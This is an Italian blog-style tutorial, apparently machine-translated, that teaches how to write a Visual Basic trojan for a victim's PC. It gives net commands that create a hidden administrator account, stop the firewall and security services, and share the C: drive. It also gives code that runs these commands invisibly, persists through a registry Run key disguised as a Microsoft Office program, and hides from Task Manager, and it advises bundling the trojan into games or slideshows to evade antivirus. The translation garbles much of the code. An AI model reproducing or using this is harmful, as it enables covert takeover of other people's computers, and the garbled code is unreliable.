Squallido ma efficace, Lo programmi tu, Lo compili tu, L'antivirus non lo rileva e tutti sono contenti ;)
Le primo, Comandi MSDOS che ci interessa conoscere e poi inserirli nel codice Visual Basic per eseguirli sul PC della vittima,
|
COMANDO
|
ESEMPIO
|
DESCRIZIONE
|
| net user nome utente password /ADD | Utente netto IUSR_wXP piruli /add | Crea l'utente IUSR_wXP con la password 'piruli’ in modo che quando vogliamo entrare nel PC remoto abbiamo già un nome utente e una password |
| net nome grupponomeutentegruppo/ADD | net localgroup Admins /aggiungi IUSR_wXP | L'utente creato in precedenza viene inserito nel gruppo administrators, in modo da non avere problemi con i permessi. Siamo l'amministratore del PC, Cosa vogliamo di più!! 🙂 |
| Nome servizio di arresto netto | Arresto netto “Windows Firewall/Condivisione connessione Internet (ICS)” | Serve a interrompere i servizi che non vogliamo controllare, ad esempio il firewall di Windows XP, L'antivirus, Antispiware… |
| net share resourcename=Percorso: | quota netta C=C: | Condividere le unità disco o il percorso che ci interessa sul PC in esecuzione |
Non male, Tutti questi comandi, se riusciamo a pensarne di più possiamo eseguirli sul PC del ragazzo che ci interessa inserire sul suo PC (Questa è una questione di immaginazione), ad esempio, con questi ci aiuta a creare un utente che è un amministratore, fermiamo il firewall ed entriamo nel tuo disco C, tutto online e nel modo più semplice, Ora abbiamo solo bisogno che lo esegua… E come? È così semplice, Leggi sotto.
Ok, ora di solito lo faccio con Visual Basic, Non sono affatto un esperto del settore, Ma creo un software o un gioco per il ragazzo per hackerarlo e gli metto dentro queste battute. Oppure genero semplicemente il programma VB con questi 4 linee e con un Joinner (che è un programma che mi unisce diversi file che vi invio) Per esempio, Gli mando un PPS tipico di txorradas e con il joinner lo faccio girare in background, Quanto male che i joinner rilevano l'antivirus, ecco perché preferisco giocare io stesso con VB, Anche se è super stupido, ma che lo esegua.
Secondo, Come farlo Tutto questo verrà eseguito ogni volta che avvii il computer, Molto bene, Inserimento del log e generazione di una voce qui:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun
Oh, bene, Andiamo a quello che è il codice sorgente VB necessario, questo sarebbe per eseguire i comandi MSDOS che ci interessano, con questo contenuto viene creato un Sub e queste due funzioni sono definite soprattutto.
| Funzione di dichiarazione privata Processo aperto Movimento di liberazione “kernel32” (ByVal dwDesiredAccess&, ByVal bEredita Handle&, ByVal dwProcessId&) Finché Funzione di dichiarazione privata GetExitCodeProcess Movimento di liberazione “kernel32” (ByVal hProcesso Finché, lpExitCode Finché) FinchéSub PerServiziYcreaUser() Oscuro hShell Finché
Oscuro hProc Finché Oscuro codExit Finché Oscuro SCmd come stringa Oscuro Come comando stringa ‘ Per il servizio Centro sicurezza PC  Command = “Arresto netto ” & Chr(34) & “Centro sicurezza” & Chr(34)  sCmd = “Comando /c ” & Comando  hShell = Guscio(Dintorni$(“Calcolo”) & ” /c ” & SCmd, vbNascondere) ‘ La Chiesa(34) sono le virgolette doppie, per eseguire un comando MSDOS che è una frase lunga dobbiamo eseguirlo con virgolette doppie, perché è così che verrebbe messo in modo che VB lo esegua bene. ‘ Per il servizio Windows Firewall  Command = “Arresto netto ” & Chr(34) & “Windows Firewall/Condivisione connessione Internet (ICS)” & Chr(34)  sCmd = “Comando /c ” & Comando  hShell = Guscio(Dintorni$(“Calcolo”) & ” /c ” & SCmd, vbNascondere) ‘ Creare il IUSR_wXP2 utente
 Command = “net user IUSR_wXP2 Hh3rr3r01 /add”  sCmd = “Comando /c ” & Comando  hShell = Guscio(Dintorni$(“Calcolo”) & ” /c ” & SCmd, vbNascondere) ‘ Inserire l'utente nel gruppo Administrators locale ‘ Condividi C: il tuo disco rigido come C per noi per entrare x la rete, anche se potremmo anche entrare come C$ |
Ok, ora quello che ci interessa è inserirlo nel registro in modo che si avvii ogni volta che il PC della vittima si avvia e che ogni volta che riavvia il PC il servizio firewall si interrompa, quota C…
| Sub InvioSuRecord() Oscuro Hregkey Finché Oscuro Sottochiave Come stringa  subkey = “SoftwareMicrosoftWindowsCurrentVersionRun” Oscuro Buffer di stringhe Come stringa Oscuro Programma del percorso Come stringa  PathProgram = “C:WINDOWSsystem32svchost32.exe” Oscuro Nome del programma Come stringa  Nome programma = “Assistente di Microsoft Office” retval = RegOpenKeyEx(HKEY_CURRENT_USER, Sottochiave, 0, KEY_WRITE, Hregkey) Se Retval <> 0 Allora Debug.Print “Impossibile aprire la sottochiave” Esci da Sub Fine Se stringbuffer = Programma percorso & vbNullChar  retval = RegSetValueEx(Hregkey, Nome del programma, 0, REG_SZ, ByVal Buffer di stringhe, Len(Buffer di stringhe))  RegCloseKey hregkey Fine Sub |
E abbiamo bisogno di un modulo per inserire questo:
| Funzione di dichiarazione pubblica Libreria RegOpenKeyEx “advapi32.dll” Alias “RegOpenKeyExA” (ByVal hKey Finché, ByVal Chiave secondaria lp Come stringa, ByVal ulOpzioni Finché, ByVal samDesiderato Finché, phkRisultato Finché) Finché Funzione di dichiarazione pubblica Chiave di chiusura Reg Movimento di liberazione “advapi32.dll” (ByVal hKey Finché) Finché Funzione di dichiarazione pubblica RegSetValueEx Movimento di liberazione “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey Finché, ByVal lpValueName Come stringa, ByVal Riservato Finché, ByVal dwType Finché, lpData Come qualsiasi, ByVal cbData Finché) FinchéPubblico Cost. HKEY_CURRENT_USER = &H80000001 Pubblico Cost. KEY_WRITE = &H20006 Pubblico Cost. REG_SZ = 1 |
È possibile scaricare il codice sorgente completo di QUI. Se hai qualche suggerimento, chiedilo o dillo!
Personalmente mi piace metterlo all'inizio, Quando l'app viene caricata, è in modo che l'utente non lo veda sullo schermo o sul “Gestore attività” che di solito è perfetto in modo che il processo non ci uccida.
| Me.Visible = Falso App.TaskVisible = Falso |
